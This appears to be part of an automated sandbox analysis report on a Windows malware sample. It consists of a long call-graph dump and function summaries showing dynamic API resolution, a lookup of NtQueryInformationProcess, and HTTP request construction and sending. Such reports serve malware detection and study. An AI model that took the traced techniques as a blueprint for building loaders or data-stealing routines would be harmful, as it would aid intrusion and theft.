36843 4e376c 36842->36843 36844 4e4610 2 API calls 36843->36844 36845 4e3785 36844->36845 36846 4e4610 2 API calls 36845->36846 36847 4e379e 36846->36847 36848 4e4610 2 API calls 36847->36848 36849 4e37b7 36848->36849 36850 4e4610 2 API calls 36849->36850 36851 4e37d0 36850->36851 36852 4e4610 2 API calls 36851->36852 36853 4e37e9 36852->36853 36854 4e4610 2 API calls 36853->36854 36855 4e3802 36854->36855 36856 4e4610 2 API calls 36855->36856 36857 4e381b 36856->36857 36858 4e4610 2 API calls 36857->36858 36859 4e3834 36858->36859 36860 4e4610 2 API calls 36859->36860 36861 4e384d 36860->36861 36862 4e4610 2 API calls 36861->36862 36863 4e3866 36862->36863 36864 4e4610 2 API calls 36863->36864 36865 4e387f 36864->36865 36866 4e4610 2 API calls 36865->36866 36867 4e3898 36866->36867 36868 4e4610 2 API calls 36867->36868 36869 4e38b1 36868->36869 36870 4e4610 2 API calls 36869->36870 36871 4e38ca 36870->36871 36872 4e4610 2 API calls 36871->36872 36873 4e38e3 36872->36873 36874 4e4610 2 API calls 36873->36874 36875 4e38fc 36874->36875 36876 4e4610 2 API calls 36875->36876 36877 4e3915 36876->36877 36878 4e4610 2 API calls 36877->36878 36879 4e392e 36878->36879 36880 4e4610 2 API calls 36879->36880 36881 4e3947 36880->36881 36882 4e4610 2 API calls 36881->36882 36883 4e3960 36882->36883 36884 4e4610 2 API calls 36883->36884 36885 4e3979 36884->36885 36886 4e4610 2 API calls 36885->36886 36887 4e3992 36886->36887 36888 4e4610 2 API calls 36887->36888 36889 4e39ab 36888->36889 36890 4e4610 2 API calls 36889->36890 36891 4e39c4 36890->36891 36892 4e4610 2 API calls 36891->36892 36893 4e39dd 36892->36893 36894 4e4610 2 API calls 36893->36894 36895 4e39f6 36894->36895 36896 4e4610 2 API calls 36895->36896 36897 4e3a0f 36896->36897 36898 4e4610 2 API calls 36897->36898 36899 4e3a28 36898->36899 36900 4e4610 2 API calls 36899->36900 36901 4e3a41 36900->36901 36902 4e4610 2 API calls 36901->36902 36903 4e3a5a 36902->36903 36904 4e4610 2 API calls 36903->36904 36905 4e3a73 36904->36905 36906 4e4610 2 API calls 36905->36906 36907 4e3a8c 36906->36907 36908 4e4610 2 API calls 36907->36908 36909 4e3aa5 36908->36909 36910 4e4610 2 API calls 36909->36910 36911 4e3abe 36910->36911 36912 4e4610 2 API calls 36911->36912 36913 4e3ad7 36912->36913 36914 4e4610 2 API calls 36913->36914 36915 4e3af0 36914->36915 36916 4e4610 2 API calls 36915->36916 36917 4e3b09 36916->36917 36918 4e4610 2 API calls 36917->36918 36919 4e3b22 36918->36919 36920 4e4610 2 API calls 36919->36920 36921 4e3b3b 36920->36921 36922 4e4610 2 API calls 36921->36922 36923 4e3b54 36922->36923 36924 4e4610 2 API calls 36923->36924 36925 4e3b6d 36924->36925 36926 4e4610 2 API calls 36925->36926 36927 4e3b86 36926->36927 36928 4e4610 2 API calls 36927->36928 36929 4e3b9f 36928->36929 36930 4e4610 2 API calls 36929->36930 36931 4e3bb8 36930->36931 36932 4e4610 2 API calls 36931->36932 36933 4e3bd1 36932->36933 36934 4e4610 2 API calls 36933->36934 36935 4e3bea 36934->36935 36936 4e4610 2 API calls 36935->36936 36937 4e3c03 36936->36937 36938 4e4610 2 API calls 36937->36938 36939 4e3c1c 36938->36939 36940 4e4610 2 API calls 36939->36940 36941 4e3c35 36940->36941 36942 4e4610 2 API calls 36941->36942 36943 4e3c4e 36942->36943 36944 4e4610 2 API calls 36943->36944 36945 4e3c67 36944->36945 36946 4e4610 2 API calls 36945->36946 36947 4e3c80 36946->36947 36948 4e4610 2 API calls 36947->36948 36949 4e3c99 36948->36949 36950 4e4610 2 API calls 36949->36950 36951 4e3cb2 36950->36951 36952 4e4610 2 API calls 36951->36952 36953 4e3ccb 36952->36953 36954 4e4610 2 API calls 36953->36954 36955 4e3ce4 36954->36955 36956 4e4610 2 API calls 36955->36956 36957 4e3cfd 36956->36957 36958 4e4610 2 API calls 36957->36958 36959 4e3d16 36958->36959 36960 4e4610 2 API calls 36959->36960 36961 4e3d2f 36960->36961 36962 4e4610 2 API calls 36961->36962 36963 4e3d48 36962->36963 36964 4e4610 2 API calls 36963->36964 36965 4e3d61 36964->36965 36966 4e4610 2 API calls 36965->36966 36967 4e3d7a 36966->36967 36968 4e4610 2 API calls 36967->36968 36969 4e3d93 36968->36969 36970 4e4610 2 API calls 36969->36970 36971 4e3dac 36970->36971 36972 4e4610 2 API calls 36971->36972 36973 4e3dc5 36972->36973 36974 4e4610 2 API calls 36973->36974 36975 4e3dde 36974->36975 36976 4e4610 2 API calls 36975->36976 36977 4e3df7 36976->36977 36978 4e4610 2 API calls 36977->36978 36979 4e3e10 36978->36979 36980 4e4610 2 API calls 36979->36980 36981 4e3e29 36980->36981 36982 4e4610 2 API calls 36981->36982 36983 4e3e42 36982->36983 36984 4e4610 2 API calls 36983->36984 36985 4e3e5b 36984->36985 36986 4e4610 2 API calls 36985->36986 36987 4e3e74 36986->36987 36988 4e4610 2 API calls 36987->36988 36989 4e3e8d 36988->36989 36990 4e4610 2 API calls 36989->36990 36991 4e3ea6 36990->36991 36992 4e4610 2 API calls 36991->36992 36993 4e3ebf 36992->36993 36994 4e4610 2 API calls 36993->36994 36995 4e3ed8 36994->36995 36996 4e4610 2 API calls 36995->36996 36997 4e3ef1 36996->36997 36998 4e4610 2 API calls 36997->36998 36999 4e3f0a 36998->36999 37000 4e4610 2 API calls 36999->37000 37001 4e3f23 37000->37001 37002 4e4610 2 API calls 37001->37002 37003 4e3f3c 37002->37003 37004 4e4610 2 API calls 37003->37004 37005 4e3f55 37004->37005 37006 4e4610 2 API calls 37005->37006 37007 4e3f6e 37006->37007 37008 4e4610 2 API calls 37007->37008 37009 4e3f87 37008->37009 37010 4e4610 2 API calls 37009->37010 37011 4e3fa0 37010->37011 37012 4e4610 2 API calls 37011->37012 37013 4e3fb9 37012->37013 37014 4e4610 2 API calls 37013->37014 37015 4e3fd2 37014->37015 37016 4e4610 2 API calls 37015->37016 37017 4e3feb 37016->37017 37018 4e4610 2 API calls 37017->37018 37019 4e4004 37018->37019 37020 4e4610 2 API calls 37019->37020 37021 4e401d 37020->37021 37022 4e4610 2 API calls 37021->37022 37023 4e4036 37022->37023 37024 4e4610 2 API calls 37023->37024 37025 4e404f 37024->37025 37026 4e4610 2 API calls 37025->37026 37027 4e4068 37026->37027 37028 4e4610 2 API calls 37027->37028 37029 4e4081 37028->37029 37030 4e4610 2 API calls 37029->37030 37031 4e409a 37030->37031 37032 4e4610 2 API calls 37031->37032 37033 4e40b3 37032->37033 37034 4e4610 2 API calls 37033->37034 37035 4e40cc 37034->37035 37036 4e4610 2 API calls 37035->37036 37037 4e40e5 37036->37037 37038 4e4610 2 API calls 37037->37038 37039 4e40fe 37038->37039 37040 4e4610 2 API calls 37039->37040 37041 4e4117 37040->37041 37042 4e4610 2 API calls 37041->37042 37043 4e4130 37042->37043 37044 4e4610 2 API calls 37043->37044 37045 4e4149 37044->37045 37046 4e4610 2 API calls 37045->37046 37047 4e4162 37046->37047 37048 4e4610 2 API calls 37047->37048 37049 4e417b 37048->37049 37050 4e4610 2 API calls 37049->37050 37051 4e4194 37050->37051 37052 4e4610 2 API calls 37051->37052 37053 4e41ad 37052->37053 37054 4e4610 2 API calls 37053->37054 37055 4e41c6 37054->37055 37056 4e4610 2 API calls 37055->37056 37057 4e41df 37056->37057 37058 4e4610 2 API calls 37057->37058 37059 4e41f8 37058->37059 37060 4e4610 2 API calls 37059->37060 37061 4e4211 37060->37061 37062 4e4610 2 API calls 37061->37062 37063 4e422a 37062->37063 37064 4e4610 2 API calls 37063->37064 37065 4e4243 37064->37065 37066 4e4610 2 API calls 37065->37066 37067 4e425c 37066->37067 37068 4e4610 2 API calls 37067->37068 37069 4e4275 37068->37069 37070 4e4610 2 API calls 37069->37070 37071 4e428e 37070->37071 37072 4e4610 2 API calls 37071->37072 37073 4e42a7 37072->37073 37074 4e4610 2 API calls 37073->37074 37075 4e42c0 37074->37075 37076 4e4610 2 API calls 37075->37076 37077 4e42d9 37076->37077 37078 4e4610 2 API calls 37077->37078 37079 4e42f2 37078->37079 37080 4e4610 2 API calls 37079->37080 37081 4e430b 37080->37081 37082 4e4610 2 API calls 37081->37082 37083 4e4324 37082->37083 37084 4e4610 2 API calls 37083->37084 37085 4e433d 37084->37085 37086 4e4610 2 API calls 37085->37086 37087 4e4356 37086->37087 37088 4e4610 2 API calls 37087->37088 37089 4e436f 37088->37089 37090 4e4610 2 API calls 37089->37090 37091 4e4388 37090->37091 37092 4e4610 2 API calls 37091->37092 37093 4e43a1 37092->37093 37094 4e4610 2 API calls 37093->37094 37095 4e43ba 37094->37095 37096 4e4610 2 API calls 37095->37096 37097 4e43d3 37096->37097 37098 4e4610 2 API calls 37097->37098 37099 4e43ec 37098->37099 37100 4e4610 2 API calls 37099->37100 37101 4e4405 37100->37101 37102 4e4610 2 API calls 37101->37102 37103 4e441e 37102->37103 37104 4e4610 2 API calls 37103->37104 37105 4e4437 37104->37105 37106 4e4610 2 API calls 37105->37106 37107 4e4450 37106->37107 37108 4e4610 2 API calls 37107->37108 37109 4e4469 37108->37109 37110 4e4610 2 API calls 37109->37110 37111 4e4482 37110->37111 37112 4e4610 2 API calls 37111->37112 37113 4e449b 37112->37113 37114 4e4610 2 API calls 37113->37114 37115 4e44b4 37114->37115 37116 4e4610 2 API calls 37115->37116 37117 4e44cd 37116->37117 37118 4e4610 2 API calls 37117->37118 37119 4e44e6 37118->37119 37120 4e4610 2 API calls 37119->37120 37121 4e44ff 37120->37121 37122 4e4610 2 API calls 37121->37122 37123 4e4518 37122->37123 37124 4e4610 2 API calls 37123->37124 37125 4e4531 37124->37125 37126 4e4610 2 API calls 37125->37126 37127 4e454a 37126->37127 37128 4e4610 2 API calls 37127->37128 37129 4e4563 37128->37129 37130 4e4610 2 API calls 37129->37130 37131 4e457c 37130->37131 37132 4e4610 2 API calls 37131->37132 37133 4e4595 37132->37133 37134 4e4610 2 API calls 37133->37134 37135 4e45ae 37134->37135 37136 4e4610 2 API calls 37135->37136 37137 4e45c7 37136->37137 37138 4e4610 2 API calls 37137->37138 37139 4e45e0 37138->37139 37140 4e4610 2 API calls 37139->37140 37141 4e45f9 37140->37141 37142 4f9f20 37141->37142 37143 4fa346 8 API calls 37142->37143 37144 4f9f30 43 API calls 37142->37144 37145 4fa3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37143->37145 37146 4fa456 37143->37146 37144->37143 37145->37146 37147 4fa526 37146->37147 37148 4fa463 8 API calls 37146->37148 37149 4fa52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37147->37149 37150 4fa5a8 37147->37150 37148->37147 37149->37150 37151 4fa647 37150->37151 37152 4fa5b5 6 API calls 37150->37152 37153 4fa72f 37151->37153 37154 4fa654 9 API calls 37151->37154 37152->37151 37155 4fa738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37153->37155 37156 4fa7b2 37153->37156 37154->37153 37155->37156 37157 4fa7ec 37156->37157 37158 4fa7bb GetProcAddress GetProcAddress 37156->37158 37159 4fa825 37157->37159 37160 4fa7f5 GetProcAddress GetProcAddress 37157->37160 37158->37157 37161 4fa922 37159->37161 37162 4fa832 10 API calls 37159->37162 37160->37159 37163 4fa98d 37161->37163 37164 4fa92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37161->37164 37162->37161 37165 4fa9ae 37163->37165 37166 4fa996 GetProcAddress 37163->37166 37164->37163 37167 4f5ef3 37165->37167 37168 4fa9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37165->37168 37166->37165 37169 4e1590 37167->37169 37168->37167 37439 4e16b0 37169->37439 37172 4faab0 lstrcpy 37173 4e15b5 37172->37173 37174 4faab0 lstrcpy 37173->37174 37175 4e15c7 37174->37175 37176 4faab0 lstrcpy 37175->37176 37177 4e15d9 37176->37177 37178 4faab0 lstrcpy 37177->37178 37179 4e1663 37178->37179 37180 4f5760 37179->37180 37181 4f5771 37180->37181 37182 4fab30 2 API calls 37181->37182 37183 4f577e 37182->37183 37184 4fab30 2 API calls 37183->37184 37185 4f578b 37184->37185 37186 4fab30 2 API calls 37185->37186 37187 4f5798 37186->37187 37188 4faa50 lstrcpy 37187->37188 37189 4f57a5 37188->37189 37190 4faa50 lstrcpy 37189->37190 37191 4f57b2 37190->37191 37192 4faa50 lstrcpy 37191->37192 37193 4f57bf 37192->37193 37194 4faa50 lstrcpy 37193->37194 37233 4f57cc 37194->37233 37195 4e1590 lstrcpy 37195->37233 37196 4f5893 StrCmpCA 37196->37233 37197 4f58f0 StrCmpCA 37198 4f5a2c 37197->37198 37197->37233 37199 4fabb0 lstrcpy 37198->37199 37200 4f5a38 37199->37200 37201 4fab30 2 API calls 37200->37201 37203 4f5a46 37201->37203 37202 4f5aa6 StrCmpCA 37204 4f5be1 37202->37204 37202->37233 37205 4fab30 2 API calls 37203->37205 37207 4fabb0 lstrcpy 37204->37207 37206 4f5a55 37205->37206 37208 4e16b0 lstrcpy 37206->37208 37209 4f5bed 37207->37209 37229 4f5a61 37208->37229 37212 4fab30 2 API calls 37209->37212 37210 4faa50 lstrcpy 37210->37233 37211 4fab30 lstrlen lstrcpy 37211->37233 37214 4f5bfb 37212->37214 37213 4f5c5b StrCmpCA 37216 4f5c78 37213->37216 37217 4f5c66 Sleep 37213->37217 37215 4fab30 2 API calls 37214->37215 37218 4f5c0a 37215->37218 37219 4fabb0 lstrcpy 37216->37219 37217->37233 37220 4e16b0 lstrcpy 37218->37220 37221 4f5c84 37219->37221 37220->37229 37222 4fab30 2 API calls 37221->37222 37223 4f5c93 37222->37223 37225 4fab30 2 API calls 37223->37225 37224 4f5510 25 API calls 37224->37233 37226 4f5ca2 37225->37226 37228 4e16b0 lstrcpy 37226->37228 37227 4f59da StrCmpCA 37227->37233 37228->37229 37229->36287 37230 4f5b8f StrCmpCA 37230->37233 37231 4faab0 lstrcpy 37231->37233 37232 4f5440 20 API calls 37232->37233 37233->37195 37233->37196 37233->37197 37233->37202 37233->37210 37233->37211 37233->37213 37233->37224 37233->37227 37233->37230 37233->37231 37233->37232 37234 4fabb0 lstrcpy 37233->37234 37234->37233 37236 4f76dc 37235->37236 37237 4f76e3 GetVolumeInformationA 37235->37237 37236->37237 37238 4f7721 37237->37238 37239 4f778c GetProcessHeap RtlAllocateHeap 37238->37239 37240 4f77a9 37239->37240 37241 4f77b8 wsprintfA 37239->37241 37242 4faa50 lstrcpy 37240->37242 37243 4faa50 lstrcpy 37241->37243 37244 4f5ff7 37242->37244 37243->37244 37244->36308 37246 4faab0 lstrcpy 37245->37246 37247 4e48e9 37246->37247 37448 4e4800 37247->37448 37249 4e48f5 37250 4faa50 lstrcpy 37249->37250 37251 4e4927 37250->37251 37252 4faa50 lstrcpy 37251->37252 37253 4e4934 37252->37253 37254 4faa50 lstrcpy 37253->37254 37255 4e4941 37254->37255 37256 4faa50 lstrcpy 37255->37256 37257 4e494e 37256->37257 37258 4faa50 lstrcpy 37257->37258 37259 4e495b InternetOpenA StrCmpCA 37258->37259 37260 4e4994 37259->37260 37261 4e4f1b InternetCloseHandle 37260->37261 37454 4f8cf0 37260->37454 37263 4e4f38 37261->37263 37469 4ea210 CryptStringToBinaryA 37263->37469 37264 4e49b3 37462 4fac30 37264->37462 37267 4e49c6 37269 4fabb0 lstrcpy 37267->37269 37273 4e49cf 37269->37273 37270 4fab30 2 API calls 37271 4e4f55 37270->37271 37274 4facc0 4 API calls 37271->37274 37272 4e4f77 ctype 37276 4faab0 lstrcpy 37272->37276 37278 4facc0 4 API calls 37273->37278 37275 4e4f6b 37274->37275 37277 4fabb0 lstrcpy 37275->37277 37289 4e4fa7 37276->37289 37277->37272 37279 4e49f9 37278->37279 37280 4fabb0 lstrcpy 37279->37280 37281 4e4a02 37280->37281 37282 4facc0 4 API calls 37281->37282 37283 4e4a21 37282->37283 37284 4fabb0 lstrcpy 37283->37284 37285 4e4a2a 37284->37285 37286 4fac30 3 API calls 37285->37286 37287 4e4a48 37286->37287 37288 4fabb0 lstrcpy 37287->37288 37290 4e4a51 37288->37290 37289->36311 37291 4facc0 4 API calls 37290->37291 37292 4e4a70 37291->37292 37293 4fabb0 lstrcpy 37292->37293 37294 4e4a79 37293->37294 37295 4facc0 4 API calls 37294->37295 37296 4e4a98 37295->37296 37297 4fabb0 lstrcpy 37296->37297 37298 4e4aa1 37297->37298 37299 4facc0 4 API calls 37298->37299 37300 4e4acd 37299->37300 37301 4fac30 3 API calls 37300->37301 37302 4e4ad4 37301->37302 37303 4fabb0 lstrcpy 37302->37303 37304 4e4add 37303->37304 37305 4e4af3 InternetConnectA 37304->37305 37305->37261 37306 4e4b23 HttpOpenRequestA 37305->37306 37308 4e4f0e InternetCloseHandle 37306->37308 37309 4e4b78 37306->37309 37308->37261 37310 4facc0 4 API calls 37309->37310 37311 4e4b8c 37310->37311 37312 4fabb0 lstrcpy 37311->37312 37313 4e4b95 37312->37313 37314 4fac30 3 API calls 37313->37314 37315 4e4bb3 37314->37315 37316 4fabb0 lstrcpy 37315->37316 37317 4e4bbc 37316->37317 37318 4facc0 4 API calls 37317->37318 37319 4e4bdb 37318->37319 37320 4fabb0 lstrcpy 37319->37320 37321 4e4be4 37320->37321 37322 4facc0 4 API calls 37321->37322 37323 4e4c05 37322->37323 37324 4fabb0 lstrcpy 37323->37324 37325 4e4c0e 37324->37325 37326 4facc0 4 API calls 37325->37326 37327 4e4c2e 37326->37327 37328 4fabb0 lstrcpy 37327->37328 37329 4e4c37 37328->37329 37330 4facc0 4 API calls 37329->37330 37331 4e4c56 37330->37331 37332 4fabb0 lstrcpy 37331->37332 37333 4e4c5f 37332->37333 37334 4fac30 3 API calls 37333->37334 37335 4e4c7d 37334->37335 37336 4fabb0 lstrcpy 37335->37336 37337 4e4c86 37336->37337 37338 4facc0 4 API calls 37337->37338 37339 4e4ca5 37338->37339 37340 4fabb0 lstrcpy 37339->37340 37341 4e4cae 37340->37341 37342 4facc0 4 API calls 37341->37342 37343 4e4ccd 37342->37343 37344 4fabb0 lstrcpy 37343->37344 37345 4e4cd6 37344->37345 37346 4fac30 3 API calls 37345->37346 37347 4e4cf4 37346->37347 37348 4fabb0 lstrcpy 37347->37348 37349 4e4cfd 37348->37349 37350 4facc0 4 API calls 37349->37350 37351 4e4d1c 37350->37351 37352 4fabb0 lstrcpy 37351->37352 37353 4e4d25 37352->37353 37354 4facc0 4 API calls 37353->37354 37355 4e4d46 37354->37355 37356 4fabb0 lstrcpy 37355->37356 37357 4e4d4f 37356->37357 37358 4facc0 4 API calls 37357->37358 37359 4e4d6f 37358->37359 37360 4fabb0 lstrcpy 37359->37360 37361 4e4d78 37360->37361 37362 4facc0 4 API calls 37361->37362 37363 4e4d97 37362->37363 37364 4fabb0 lstrcpy 37363->37364 37365 4e4da0 37364->37365 37366 4fac30 3 API calls 37365->37366 37367 4e4dbe 37366->37367 37368 4fabb0 lstrcpy 37367->37368 37369 4e4dc7 37368->37369 37370 4faa50 lstrcpy 37369->37370 37371 4e4de2 37370->37371 37372 4fac30 3 API calls 37371->37372 37373 4e4e03 37372->37373 37374 4fac30 3 API calls 37373->37374 37375 4e4e0a 37374->37375 37376 4fabb0 lstrcpy 37375->37376 37377 4e4e16 37376->37377 37378 4e4e37 lstrlen 37377->37378 37379 4e4e4a 37378->37379 37380 4e4e53 lstrlen 37379->37380 37468 4fade0 37380->37468 37382 4e4e63 HttpSendRequestA 37383 4e4e82 InternetReadFile 37382->37383 37384 4e4eb7 InternetCloseHandle 37383->37384 37389 4e4eae 37383->37389 37386 4fab10 37384->37386 37386->37308 37387 4facc0 4 API calls 37387->37389 37388 4fabb0 lstrcpy 37388->37389 37389->37383 37389->37384 37389->37387 37389->37388 37475 4fade0 37390->37475 37392 4f1a14 StrCmpCA 37393 4f1a1f ExitProcess 37392->37393 37397 4f1a27 37392->37397 37394 4f1c12 37394->36313 37395 4f1acf StrCmpCA 37395->37397 37396 4f1aad StrCmpCA 37396->37397 37397->37394 37397->37395 37397->37396 37398 4f1b63 StrCmpCA 37397->37398 37399 4f1b82 StrCmpCA 37397->37399 37400 4f1b41 StrCmpCA 37397->37400 37401 4f1ba1 StrCmpCA 37397->37401 37402 4f1bc0 StrCmpCA 37397->37402 37403 4f1b1f StrCmpCA 37397->37403 37404 4f1afd StrCmpCA 37397->37404 37405 4fab30 lstrlen lstrcpy 37397->37405 37398->37397 37399->37397 37400->37397 37401->37397 37402->37397 37403->37397 37404->37397 37405->37397 37406->36319 37407->36321 37408->36327 37409->36329 37410->36335 37411->36337 37412->36341 37413->36345 37414->36349 37415->36355 37416->36357 37417->36361 37418->36374 37419->36379 37420->36378 37421->36375 37422->36378 37423->36390 37424->36416 37425->36395 37426->36403 37427->36392 37428->36393 37429->36396 37430->36405 37431->36407 37432->36432 37433->36436 37434->36435 37435->36431 37436->36435 37437->36445 37440 4faab0 lstrcpy 37439->37440 37441 4e16c3 37440->37441 37442 4faab0 lstrcpy 37441->37442 37443 4e16d5 37442->37443 37444 4faab0 lstrcpy 37443->37444 37445 4e16e7 37444->37445 37446 4faab0 lstrcpy 37445->37446 37447 4e15a3 37446->37447 37447->37172 37449 4e4816 37448->37449 37450 4e4888 lstrlen 37449->37450 37474 4fade0 37450->37474 37452 4e4898 InternetCrackUrlA 37453 4e48b7 37452->37453 37453->37249 37455 4faa50 lstrcpy 37454->37455 37456 4f8d04 37455->37456 37457 4faa50 lstrcpy 37456->37457 37458 4f8d12 GetSystemTime 37457->37458 37459 4f8d29 37458->37459 37460 4faab0 lstrcpy 37459->37460 37461 4f8d8c 37460->37461 37461->37264 37463 4fac41 37462->37463 37464 4fac98 37463->37464 37466 4fac78 lstrcpy lstrcat 37463->37466 37465 4faab0 lstrcpy 37464->37465 37467 4faca4 37465->37467 37466->37464 37467->37267 37468->37382 37470 4e4f3e 37469->37470 37471 4ea249 LocalAlloc 37469->37471 37470->37270 37470->37272 37471->37470 37472 4ea264 CryptStringToBinaryA 37471->37472 37472->37470 37473 4ea289 LocalFree 37472->37473 37473->37470 37474->37452 37475->37392

                                        Executed Functions

                                        Function 004F9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 4f9bb0-4f9bc4 call 4f9aa0 663 4f9bca-4f9dde call 4f9ad0 GetProcAddress * 21 660->663 664 4f9de3-4f9e42 LoadLibraryA * 5 660->664 663->664 666 4f9e5d-4f9e64 664->666 667 4f9e44-4f9e58 GetProcAddress 664->667 669 4f9e96-4f9e9d 666->669 670 4f9e66-4f9e91 GetProcAddress * 2 666->670 667->666 671 4f9e9f-4f9eb3 GetProcAddress 669->671 672 4f9eb8-4f9ebf 669->672 670->669 671->672 673 4f9ed9-4f9ee0 672->673 674 4f9ec1-4f9ed4 GetProcAddress 672->674 675 4f9ee2-4f9f0c GetProcAddress * 2 673->675 676 4f9f11-4f9f12 673->676 674->673 675->676
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,01452440), ref: 004F9BF1
                                        • GetProcAddress.KERNEL32(74DD0000,014521D0), ref: 004F9C0A
                                        • GetProcAddress.KERNEL32(74DD0000,01452218), ref: 004F9C22
                                        • GetProcAddress.KERNEL32(74DD0000,014521A0), ref: 004F9C3A
                                        • GetProcAddress.KERNEL32(74DD0000,014522C0), ref: 004F9C53
                                        • GetProcAddress.KERNEL32(74DD0000,014590A0), ref: 004F9C6B
                                        • GetProcAddress.KERNEL32(74DD0000,014456F0), ref: 004F9C83
                                        • GetProcAddress.KERNEL32(74DD0000,01445630), ref: 004F9C9C
                                        • GetProcAddress.KERNEL32(74DD0000,014521B8), ref: 004F9CB4
                                        • GetProcAddress.KERNEL32(74DD0000,014522F0), ref: 004F9CCC
                                        • GetProcAddress.KERNEL32(74DD0000,014521E8), ref: 004F9CE5
                                        • GetProcAddress.KERNEL32(74DD0000,01452230), ref: 004F9CFD
                                        • GetProcAddress.KERNEL32(74DD0000,01445850), ref: 004F9D15
                                        • GetProcAddress.KERNEL32(74DD0000,014522A8), ref: 004F9D2E
                                        • GetProcAddress.KERNEL32(74DD0000,01452200), ref: 004F9D46
                                        • GetProcAddress.KERNEL32(74DD0000,014458F0), ref: 004F9D5E
                                        • GetProcAddress.KERNEL32(74DD0000,01452248), ref: 004F9D77
                                        • GetProcAddress.KERNEL32(74DD0000,014522D8), ref: 004F9D8F
                                        • GetProcAddress.KERNEL32(74DD0000,01445830), ref: 004F9DA7
                                        • GetProcAddress.KERNEL32(74DD0000,01452260), ref: 004F9DC0
                                        • GetProcAddress.KERNEL32(74DD0000,01445690), ref: 004F9DD8
                                        • LoadLibraryA.KERNEL32(01452500,?,004F6CA0), ref: 004F9DEA
                                        • LoadLibraryA.KERNEL32(01452518,?,004F6CA0), ref: 004F9DFB
                                        • LoadLibraryA.KERNEL32(01452530,?,004F6CA0), ref: 004F9E0D
                                        • LoadLibraryA.KERNEL32(014524B8,?,004F6CA0), ref: 004F9E1F
                                        • LoadLibraryA.KERNEL32(014524A0,?,004F6CA0), ref: 004F9E30
                                        • GetProcAddress.KERNEL32(75A70000,01452470), ref: 004F9E52
                                        • GetProcAddress.KERNEL32(75290000,01452488), ref: 004F9E73
                                        • GetProcAddress.KERNEL32(75290000,014524D0), ref: 004F9E8B
                                        • GetProcAddress.KERNEL32(75BD0000,014524E8), ref: 004F9EAD
                                        • GetProcAddress.KERNEL32(75450000,01445870), ref: 004F9ECE
                                        • GetProcAddress.KERNEL32(76E90000,01459170), ref: 004F9EEF
                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004F9F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 004F9EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: d0a4ac2b3194919e5bfe0958740c2b3f095d750cd2de5230f722fc3551bcc40b
                                        • Instruction ID: c6cd9263c3952deab64ae179b76d7e6887fe73502850d998418ca7945af06198
                                        • Opcode Fuzzy Hash: d0a4ac2b3194919e5bfe0958740c2b3f095d750cd2de5230f722fc3551bcc40b
                                        • Instruction Fuzzy Hash: BDA1DDB55182089FC748DF69EC88FA67BB9B7CD601710C71AF609972B4D63C9940CB68
                                        Function 004E4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 4e4610-4e46e5 RtlAllocateHeap 781 4e46f0-4e46f6 764->781 782 4e479f-4e47f9 VirtualProtect 781->782 783 4e46fc-4e479a 781->783 783->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E465E
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004E47EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E47B5
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4688
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004E4728
